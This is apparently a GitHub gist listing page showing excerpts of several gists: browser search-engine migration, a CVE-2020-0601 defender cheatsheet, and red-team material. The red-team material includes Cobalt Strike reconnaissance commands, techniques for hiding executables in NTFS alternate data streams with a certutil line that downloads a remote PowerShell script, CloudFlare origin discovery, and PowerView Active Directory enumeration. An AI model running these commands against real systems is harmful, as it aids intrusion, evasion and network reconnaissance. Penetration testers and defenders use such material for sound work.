Skip to content

Instantly share code, notes, and snippets.

View cowbe0x004's full-sized avatar

Andréw Hüang cowbe0x004

17 followers · 2 following
View GitHub Profile
@appel
appel / search-engines-import-export-chrome-edge-brave.md
Last active October 29, 2024 01:00
Export and import search engines from Chrome/Edge to Brave (bonus: Firefox to Firefox)

Export and import search engines from Chrome/Edge/Brave to Chrome/Edge/Brave

Bonus: Firefox to Firefox, see instructions at the bottom

As discussed here: brave/brave-browser#695

Thanks to the excellent answer by @Redsandro I was able to do this on Windows, which I'll document below because my future self will inevitably find this via Google a few years from now. Since it's using SQLite it should not be too hard to adapt for Macos and Linux.

Edit: this method still worked as of 9/3/2023. :)

@SwitHak
SwitHak / 20200114-TLP-WHITE_CVE-2020-0601.md
Last active February 9, 2024 14:42
BlueTeam CheatSheet * CVE-2020-0601 * crypt32.dll | Last updated: 2020-01-21 1817 UTC

CVE-2020-0601 AKA ChainOfFools OR CurveBall

General

  • Microsoft disclosed a vulnerability in their monthly Patch Tuesday referenced under CVE-2020-0601.
  • The vulnerability was discovered by the U.S. National Security Agency, anounced today (2020-01-14) in their press conference, followed by a blog post and an official security advisory.
  • The flaw is located in the "CRYPT32.DLL" file under the C:\Windows\System32\ directory.

Vulnerability explanation

  • NSA description:
  • NSA has discovered a critical vulnerability (CVE-2020-0601) affecting Microsoft Windows® cryptographic functionality.
@liamosaur
liamosaur / foxyproxy.json
Created June 3, 2019 05:16
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@api0cradle
api0cradle / Exe_ADS_Methods.md
Last active December 13, 2024 18:36
Execute from Alternate Streams

Add content to ADS

type C:\temp\evil.exe > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:evil.exe"

extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe

findstr /V /L W3AllLov3DonaldTrump c:\ADS\procexp.exe > c:\ADS\file.txt:procexp.exe

certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt

makecab c:\ADS\autoruns.exe c:\ADS\cabtest.txt:autoruns.cab

@chokepoint
chokepoint / cloudsnare
Created September 28, 2017 16:20
Identify IPv4 hosts behind CloudFlare using certificate data
#!/usr/bin/env python3
import censys.certificates
import censys.ipv4
from sys import argv
UID = "**CHANGE**"
SECRET = "**CHANGE**"
def is_cloudflare(dn):
@curi0usJack
curi0usJack / .htaccess
Last active December 6, 2024 15:29
FYI THIS IS NO LONGER AN .HTACCESS FILE. SEE COMMENTS BELOW. DON'T WORRY, IT'S STILL EASY.
#
# TO-DO: set |DESTINATIONURL| below to be whatever you want e.g. www.google.com. Do not include "http(s)://" as a prefix. All matching requests will be sent to that url. Thanks @Meatballs__!
#
# Note this version requires Apache 2.4+
#
# Save this file into something like /etc/apache2/redirect.rules.
# Then in your site's apache conf file (in /etc/apache2/sites-avaiable/), put this statement somewhere near the bottom
#
# Include /etc/apache2/redirect.rules
#
@carnal0wnage
carnal0wnage / gist:606c41ac6ec40bf5c69d4db96d9312e3
Created April 28, 2017 16:07
Red Team Books
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@CMCDragonkai
CMCDragonkai / memory_layout.md
Last active November 11, 2024 13:39
Linux: Understanding the Memory Layout of Linux Executables

Understanding the Memory Layout of Linux Executables

Required tools for playing around with memory:

  • hexdump
  • objdump
  • readelf
  • xxd
  • gcore
@HarmJ0y
HarmJ0y / PowerView-2.0-tricks.ps1
Last active September 30, 2024 16:39
PowerView-2.0 tips and tricks
# NOTE: the most updated version of PowerView (http://www.harmj0y.net/blog/powershell/make-powerview-great-again/)
# has an updated tricks Gist at https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993
# get all the groups a user is effectively a member of, 'recursing up'
Get-NetGroup -UserName <USER>
# get all the effective members of a group, 'recursing down'
Get-NetGroupMember -GoupName <GROUP> -Recurse
# get the effective set of users who can administer a server